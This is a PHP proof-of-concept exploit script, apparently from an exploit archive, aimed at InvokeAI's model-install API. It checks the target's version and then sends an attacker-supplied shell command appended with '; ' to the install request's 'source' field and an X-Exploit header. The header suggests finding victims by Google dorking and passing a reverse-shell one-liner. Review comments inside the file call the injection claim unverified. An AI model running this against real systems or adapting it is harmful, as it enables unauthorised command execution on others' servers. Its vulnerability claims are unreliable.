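<?php

declare(strict_types=1);

/*
 * ===============================================================================================
 * # Title     : InvokeAI v5.0 PHP Code Injection Vulnerability
 *               (NOTE(review): the PoC below is written in PHP; the claimed weakness is in
 *               InvokeAI's model-install API, not in any PHP code on the target.)
 * # Author    : indoushka
 * # Tested on : Windows 10 Fr (Pro) / browser: Mozilla Firefox 135.0.1 (64 bits)
 * # Vendor    : https://www.invoke.com/
 * ===============================================================================================
 *
 * POC:
 *  [+] Find targets via Google dorking or another search engine.
 *  [+] The original write-up describes this as remote command execution against InvokeAI's
 *      model-install API, which it says downloads and loads models without validating
 *      their integrity.
 *      NOTE(review): what this script actually sends is a shell-metacharacter string appended
 *      to the `source` field of POST /api/v2/models/install. Nothing on this page shows the
 *      server handing `source` to a shell, and this script does not host the `.ckpt` it
 *      references, so the command-injection claim is unverified here. The "vulnerable"
 *      version range (4.0.0 - 5.4.2) is the author's claim; the script only string-compares
 *      the reported version against it.
 *  [+] Save the code as poc.php.
 *  [+] Usage: php poc.php <target-host> "<command>" [port]
 *      e.g.   php poc.php 127.0.0.1 id
 *      Target and command are read from the command line; nothing in the file needs editing.
 *      A reverse-shell one-liner can be passed as <command> if that is what you intend to test.
 *  [+] Only run this against systems you are authorised to test.
 */

/**
 * Proof-of-concept client for the InvokeAI model-install endpoint.
 *
 * Flow: read /api/v1/app/version, compare it with the range the original author flagged,
 * then POST a model "source" containing the supplied command to /api/v2/models/install.
 */
final class InvokeAIExploit
{
    /** Bounds of the version range the original author flags as vulnerable (unverified). */
    private const VULN_MIN = '4.0.0';
    private const VULN_MAX = '5.4.2';

    /** Seconds before a connect/request is abandoned, so a dead host does not hang the script. */
    private const REQUEST_TIMEOUT = 10;

    /**
     * @param string      $target    hostname or IP of the InvokeAI instance
     * @param string      $payload   command to append to the model source (was previously ignored)
     * @param int         $port      InvokeAI web port. NOTE(review): 9090 is the usual default; confirm for your target.
     * @param int         $localPort port on which a `.ckpt` is expected to be served. NOTE(review): nothing in this
     *                               script serves that file; the value only shapes the URL that is sent.
     * @param string|null $modelUrl  explicit URL of a checkpoint you host yourself; overrides the generated URL
     */
    public function __construct(
        private string $target,
        private string $payload,
        private int $port = 9090,
        private int $localPort = 8000,
        private ?string $modelUrl = null,
    ) {
    }

    /**
     * Issue one HTTP request against the target and return the raw body.
     *
     * @param string                   $method  HTTP verb (GET, POST, ...)
     * @param string                   $uri     path relative to the server root, without a leading slash
     * @param list<string>             $headers extra request headers
     * @param array<string,mixed>|null $data    body to send as JSON; sent only when non-null
     * @return string|null response body, or null on a transport error (the error is printed to STDERR)
     */
    private function sendRequest(string $method, string $uri, array $headers = [], ?array $data = null): ?string
    {
        $url = sprintf('http://%s:%d/%s', $this->target, $this->port, $uri);
        $ch = curl_init($url);
        if ($ch === false) {
            fwrite(STDERR, "cURL Error: could not initialise handle for {$url}\n");
            return null;
        }
        curl_setopt_array($ch, [
            CURLOPT_CUSTOMREQUEST  => $method,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_HTTPHEADER     => $headers,
            CURLOPT_CONNECTTIMEOUT => self::REQUEST_TIMEOUT,
            CURLOPT_TIMEOUT        => self::REQUEST_TIMEOUT,
        ]);
        if ($data !== null) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data, JSON_THROW_ON_ERROR));
        }
        $response = curl_exec($ch);
        if ($response === false) {
            // Previously the error went to STDOUT and `false` leaked into json_decode(); keep it out of the output stream.
            fwrite(STDERR, 'cURL Error: ' . curl_error($ch) . "\n");
            curl_close($ch);
            return null;
        }
        curl_close($ch);
        return (string) $response;
    }

    /**
     * Fetch the target's reported version and classify it against the claimed range.
     *
     * @return string one of "Unknown version", "Vulnerable version detected: X" or "Safe version: X"
     */
    public function checkVulnerability(): string
    {
        echo '[' . date('H:i:s') . "] Checking target...\n";
        $response = $this->sendRequest('GET', 'api/v1/app/version');
        return self::classifyVersion(self::extractVersion($response));
    }

    /**
     * Pull the `version` string out of the /api/v1/app/version JSON body.
     *
     * @param string|null $body raw response body, or null when the request failed
     * @return string|null the version, or null when the body is missing, not JSON, or has no string `version`
     */
    public static function extractVersion(?string $body): ?string
    {
        if ($body === null) {
            return null;
        }
        $json = json_decode($body, true);
        if (!is_array($json) || !isset($json['version']) || !is_string($json['version'])) {
            return null;
        }
        return $json['version'];
    }

    /**
     * Map a version string to the status line printed by the PoC.
     *
     * "Safe version" only means "outside the range the original author listed"; it is not
     * evidence that the target is patched.
     */
    public static function classifyVersion(?string $version): string
    {
        if ($version === null) {
            return 'Unknown version';
        }
        $inRange = version_compare($version, self::VULN_MIN, '>=')
            && version_compare($version, self::VULN_MAX, '<=');
        return $inRange
            ? "Vulnerable version detected: {$version}"
            : "Safe version: {$version}";
    }

    /**
     * Build the JSON body for POST /api/v2/models/install.
     *
     * The `source` is a checkpoint URL followed by `; <command>`, exactly the shape the original
     * PoC sent. `inplace` is sent as the string "true" as in the original; if the API expects a
     * JSON boolean, change it to `true`.
     *
     * @return array{source: string, inplace: string}
     */
    public function buildInstallBody(): array
    {
        $modelUrl = $this->modelUrl
            ?? sprintf('http://%s:%d/%s.ckpt', $this->target, $this->localPort, bin2hex(random_bytes(4)));
        return [
            'source'  => "{$modelUrl}; {$this->payload}",
            'inplace' => 'true',
        ];
    }

    /**
     * Send the install request carrying the supplied command.
     *
     * @return string|null raw response body, or null on transport error
     */
    public function sendPayload(): ?string
    {
        $headers = [
            'Content-Type: application/json',
            // Carried over from the original PoC; it only matters if the server reads this header,
            // which nothing on this page demonstrates.
            "X-Exploit: {$this->payload}",
        ];
        echo "[+] Sending payload...\n";
        return $this->sendRequest('POST', 'api/v2/models/install', $headers, $this->buildInstallBody());
    }

    /**
     * Run the version check and, only if the version falls in the claimed range, send the payload.
     * Exits with status 1 when the target is outside the range or its version cannot be read.
     */
    public function startExploit(): void
    {
        $check = $this->checkVulnerability();
        echo "{$check}\n";
        if (!str_contains($check, 'Vulnerable')) {
            fwrite(STDERR, '[' . date('H:i:s') . "] Target is not vulnerable (version unknown or outside the claimed range).\n");
            exit(1);
        }
        $result = $this->sendPayload() ?? '(no response)';
        echo '[' . date('H:i:s') . "] Response: {$result}\n";
    }
}

// Entry point: only when this file is run directly from the CLI, so it can be included without firing requests.
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    $host = $argv[1] ?? null;
    $command = $argv[2] ?? null;
    if ($host === null || $command === null) {
        fwrite(STDERR, "Usage: php poc.php <target-host> <command> [port]\n");
        exit(2);
    }
    $port = isset($argv[3]) ? (int) $argv[3] : 9090;
    (new InvokeAIExploit($host, $command, $port))->startExploit();
}

/*
 * Greetings to: jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
 */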